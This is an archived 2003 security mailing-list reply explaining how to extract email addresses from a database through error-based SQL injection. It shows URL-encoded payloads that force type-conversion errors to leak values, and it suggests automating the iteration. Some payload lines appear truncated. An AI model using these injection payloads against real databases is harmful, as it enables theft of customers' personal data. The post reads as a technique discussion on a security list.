|
|||||||||||
|
RE: SQL injection - get more values
From: Brass, Phil (ISS Atlanta) <PBrass(at)iss.net>
Date: Wed Feb 12 2003 - 14:05:02 EST
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b
Try this:
After you get the first value (say it's anon@isp.com), you throw it into the where clause:
> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
You get the next value, say it's axon@isp.com, then you do the next query:
> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
And so on, until you don't get an error. Of course, for most gratifying results you write a little program that does this for you. Phil > -----Original Message-----
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ Received on Wed Feb 12 16:34:09 2003 This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:32 EDT |
||||||||||
|
|||||||||||